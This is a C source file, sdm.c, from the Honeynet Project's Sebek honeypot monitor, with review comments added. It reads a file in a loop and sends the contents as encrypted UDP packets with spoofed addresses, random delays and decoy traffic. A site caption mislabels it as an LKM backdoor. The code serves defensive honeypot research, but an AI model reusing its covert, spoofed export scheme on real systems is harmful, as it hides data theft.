
📄 sdm.c

📁 一款经典的lkm后门
💻 C
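//--------------------------------------------------------------------
//----- $Header: /home/cvsroot/sebek/mon/sdm.c,v 1.3 2002/09/08 22:48:57 cvs Exp $
//--------------------------------------------------------------------
/*
 * Copyright (C) 2001/2002 The Honeynet Project.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by The Honeynet Project.
 * 4. The name "The Honeynet Project" may not be used to endorse or promote
 *    products derived from this software without specific prior written
 *    permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

/*
 * sdm.c - user-space exporter of the Honeynet Project's sebek monitor.
 *
 * Reads blocks from a file, prefixes each block with a 32-bit host ID and
 * hands it to create_udp() for transmission through a libnet link-layer
 * handle.  While the file cannot be opened it sends all-zero decoy buffers
 * instead.  The globals pv, netmasks, filename and the helpers FatalError(),
 * get_id() and create_udp() come from sdm_utils.h and are not visible here.
 */

#include <sdm_utils.h>

/*
 * Print the command-line help.
 *
 * The option letters match the getopt string in ParseCmdLine()
 * ("vf:k:s:d:p:m:x:"): -d is the destination network and -p the
 * destination port.  The original text listed the port under -d as well,
 * which made every documented port example parse as a network.
 */
void Usage()
{
    printf(" -s source        IP network specification: a.b.c.d/xy\n");
    printf(" -d destination   IP network specification: a.b.c.d/xy\n");
    printf(" -k encryption key\n");
    printf(" -p destination port number\n");
    printf(" -m magic number\n");
    printf(" -f filename\n");
    printf(" -x maximum interpacket delay\n");
    printf(" -v verbose output\n");
    printf("Examples:\n");
    printf("  To make everything pretty random including port data:\n");
    printf("  fmon -d 10.0.0.0/8 -s 10.0.0.0/8 -m 7777 -k foobar\n\n");
    printf("  To have static destination addr and port:\n");
    printf("  fmon -d 10.0.0.1/32 -s 10.0.0.0/8 -p 123 -k foobar\n\n");
    printf("  To have static src and dst with static ports:\n");
    printf("  fmon -d 10.0.0.1/32 -s 10.0.0.2/32 -p 123 -m 223\n");
    printf("  - the src port = value of -m minus value of -p\n");
}

/*
 * Parse an "a.b.c.d[/bits]" network specification into pv.
 *
 * netstr  writable string; strtok() splits it in place at the '/'.
 * is_src  non-zero stores into pv.src_ip/pv.src_mask, zero into
 *         pv.dst_ip/pv.dst_mask.
 *
 * The address is stored in host byte order.  A missing prefix length means
 * /32.  Returns 1 on success.  The "return 0" paths are reached only if
 * FatalError() returns; it is assumed to terminate the process - confirm in
 * sdm_utils.
 */
int GenNetInfo(char* netstr,int is_src)
{
    struct in_addr net;       /* place to stick the local network data */
    u_int32_t *ip   = is_src ? &pv.src_ip   : &pv.dst_ip;
    u_int32_t *mask = is_src ? &pv.src_mask : &pv.dst_mask;
    char *addr_str;
    char *cidr_str;

    if (netstr == NULL) {
        FatalError("ERROR: Missing IP network specification\n");
        return 0;
    }

    /* break out the CIDR notation from the IP address */
    addr_str = strtok(netstr, "/");
    cidr_str = strtok(NULL, "/");

    /* strtok() yields NULL for "" or "/"; inet_addr(NULL) would be UB */
    if (addr_str == NULL) {
        FatalError("ERROR: Missing IP network specification\n");
        return 0;
    }

    if (cidr_str != NULL) {
        /* convert the CIDR notation into a real live netmask */
        char *end;
        long bits = strtol(cidr_str, &end, 10);

        /* reject trailing junk and anything outside /1../32 instead of
         * silently falling back to a /32 */
        if (end == cidr_str || *end != '\0' || bits < 1 || bits > 32) {
            FatalError("ERROR: Bad CIDR block [%s]\n", cidr_str);
            return 0;
        }
        *mask = netmasks[bits];
    } else {
        /* no mask given: assume a /32.  The original assigned the table
         * value to the pointer itself (mask = ...), so the mask in pv was
         * never written on this path. */
        *mask = netmasks[32];
    }

    /* convert the IP addr into its 32-bit value.  inet_addr() reports
     * failure in-band, so 255.255.255.255 is rejected as well. */
    net.s_addr = inet_addr(addr_str);
    if (net.s_addr == INADDR_NONE) {
        FatalError("ERROR: %s is not valid IP addr\n", addr_str);
        return 0;
    }

    /* CheckConfig() treats a zero address as "not specified", so 0.0.0.0
     * cannot be used for either side. */
    *ip = (u_int32_t)ntohl(net.s_addr);
    return 1;
}

/*
 * Validate the parsed configuration and fill in defaults.
 *
 * Requires a destination and a source address, and at least one of
 * destination port / magic number.  Defaults: pv.filename from the global
 * `filename`, pv.ipd to 1000000 (passed to usleep() in main, so
 * microseconds).  Returns 1.
 *
 * NOTE(review): an encryption key (-k) is not required here; what
 * create_udp() does when no key was set is not visible in this file.
 */
int CheckConfig()
{
    if (!pv.dst_ip) {
        Usage();
        FatalError("Need to specify Destination IP\n");
    }
    if (!pv.src_ip) {
        Usage();
        FatalError("Need to specify Source IP\n");
    }
    if (!pv.dst_port && !pv.magic) {
        Usage();
        FatalError("Need to specify the Destination Port number and/or Magic Number\n");
    }

    /* snprintf always NUL-terminates; strncpy(..., IBUF) did not when the
     * source filled the buffer.  pv.filename is assumed to hold IBUF bytes,
     * as the original bound implied. */
    if (pv.filename[0] == '\0') {
        snprintf(pv.filename, IBUF, "%s", filename);
    }

    /* a zero delay would make main() compute "% 0" */
    if (!pv.ipd) {
        pv.ipd = 1000000;
    }

    return 1;
}

/*
 * Parse the command line into pv and validate it with CheckConfig().
 *
 * Options: -v verbose, -f file, -k key, -p destination port, -m magic,
 * -s source network, -d destination network, -x maximum interpacket delay.
 * Returns the result of CheckConfig().
 */
int ParseCmdLine(int argc, char *argv[])
{
    int ch;
    int have_magic = 0;
    const char *valid_options = "vf:k:s:d:p:m:x:";
    u_char digest[16];

    while ((ch = getopt(argc, argv, valid_options)) != -1) {
        switch (ch) {
        case 'v':
            pv.verbose = 1;
            break;

        case 'f':
            /* bounded and always NUL-terminated, unlike strncpy */
            snprintf(pv.filename, IBUF, "%s", optarg);
            break;

        case 'k': {
            size_t keylen = strlen(optarg);

            if (keylen > 4 && keylen < 80) {
                /* NOTE(review): the Blowfish key is one unsalted MD5 of the
                 * passphrase, which is cheap to brute-force; changing the
                 * derivation needs a matching change on the receiving side.
                 * The passphrase also stays readable in the process
                 * argument list. */
                MD5((const unsigned char *)optarg, keylen, digest);
                BF_set_key(&pv.key, sizeof(digest), digest);
            } else {
                FatalError("Password unacceptable, either too short or too long\n");
            }
            break;
        }

        case 'p': {
            int port = atoi(optarg);

            if (port < 0 || port > 65535) {
                FatalError("ERROR: Bad port number [%s]\n", optarg);
            }
            pv.dst_port = port;
            break;
        }

        case 'm':
            pv.magic = atoi(optarg);
            have_magic = 1;
            break;

        case 's':
            GenNetInfo(optarg, 1);
            break;

        case 'd':
            GenNetInfo(optarg, 0);
            break;

        case 'x': {
            /* The original stored this value in pv.magic, so -x clobbered
             * the magic number and the delay was never configurable. */
            int delay = atoi(optarg);

            if (delay < 0) {
                delay = 0;      /* CheckConfig() then applies the default */
            }
            if (delay > MAX_INTERPKTDELAY) {
                delay = MAX_INTERPKTDELAY;
            }
            pv.ipd = delay;
            break;
        }

        default:
            /* unknown option: getopt() has already reported it */
            break;
        }
    }

    /* Derive the static source port once all options are known, so that
     * "-m 223 -p 123" behaves the same as "-p 123 -m 223". */
    if (have_magic && pv.dst_port > 0) {
        pv.src_port = pv.magic - pv.dst_port;
    }

    return CheckConfig();
}

/*
 * Program entry: initialise libnet, then loop forever exporting the
 * contents of pv.filename, or decoys when the file cannot be opened.
 */
int main(int argc, char **argv)
{
    FILE *f;
    char ar[IBUF];
    char decoy_buff[IBUF];
    int  arlen, idlen;
    size_t nread;
    struct sockaddr_in libnet_sock;
    struct libnet_link_int *write2net;
    u_char *libnet_dev = NULL;
    char libnet_err[LIBNET_ERRBUF_SIZE];
    u_int32_t id;
    int x = 0;
    int rd_sz;

    /* payload room left after the host ID */
    rd_sz = IBUF - sizeof(id);

    libnet_seed_prand();

    ParseCmdLine(argc, argv);

    /* The original wrote "if(getuid() != 0)exit;", which names the function
     * without calling it, so the check never took effect. */
    if (getuid() != 0) {
        fprintf(stderr, "ERROR: must be run as root\n");
        exit(-1);
    }

    //---- get the host ID, aka first IP addr ----
    id = get_id();

    //----- libnet initialization stuff
    if (libnet_select_device(&libnet_sock, &libnet_dev, libnet_err) == -1) {
        libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", libnet_err);
        exit(-1);
    }

    if ((write2net = libnet_open_link_interface(libnet_dev, libnet_err)) == NULL) {
        libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", libnet_err);
        exit(-1);
    }

    //----- some initialization
    memset(ar, 0, sizeof(ar));
    memset(decoy_buff, 0, sizeof(decoy_buff));

    //----- first 32 bits of payload is the host ID
    //----- set it once and forget.
    memcpy(ar, &id, sizeof(id));
    idlen = sizeof(id);
    arlen = 0;

    if (pv.verbose) printf("Reading data from: %s\n", pv.filename);

    while (1) {
        //---- if the file exists read all the data from it
        if ((f = fopen(pv.filename, "r")) != NULL) {
            /* NOTE(review): the file is reopened and re-read from the start
             * on every pass with no pause in between; an empty regular file
             * makes this loop spin.  Whether pv.filename is meant to be a
             * FIFO or device is not visible here. */

            //----- read data in blocks of rd_sz len
            while ((nread = fread(ar + idlen, 1, rd_sz, f)) > 0) {
                arlen = (int)nread + idlen;

                //----- export onto the network
                create_udp(ar, arlen, write2net, libnet_dev, 1);
                usleep(libnet_get_prand(PRu32) % pv.ipd);

                if (pv.verbose) printf("wrote %d bytes\n", arlen + 4);

                //----- zero out the data area, keeping the host ID prefix
                memset(ar + idlen, 0, sizeof(ar) - idlen);

                //----- partial buffer indicates the end of file
                if (nread != (size_t)rd_sz) {
                    break;
                }
            }
            /* single close for every way out of the read loop */
            fclose(f);
        } else {
            //------ no data, spew a few decoys
            for (x = 0; x <= MAX_DECOY; x++) {
                //----- host ID for decoys is set to 0
                create_udp(decoy_buff, sizeof(decoy_buff), write2net, libnet_dev, 0);
                usleep(libnet_get_prand(PRu32) % pv.ipd);
            }
        }
    }//While
}//Main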
